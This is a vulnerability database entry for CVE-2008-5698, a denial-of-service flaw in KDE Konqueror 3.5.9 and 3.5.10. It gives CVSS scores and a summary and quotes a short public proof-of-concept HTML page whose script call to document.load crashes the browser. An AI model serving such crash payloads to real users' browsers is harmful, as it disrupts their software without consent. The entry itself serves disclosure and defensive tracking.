4.3
CVSSv2

CVE-2008-5698

Published: 22/12/2008 Updated: 29/09/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

HTMLTokenizer::scriptHandler in Konqueror in KDE 3.5.9 and 3.5.10 allows remote malicious users to cause a denial of service (application crash) via an invalid document.load call that triggers use of a deleted object. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

kde konqueror

Exploits

<!--- Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom] Tested on Ubuntu 804 + Konqueror 359 A product of my fuzzing projects :) --> <html> <script type="text/javascript"> documentload(''); </script> </html> # milw0rmcom [2008-10-10] ...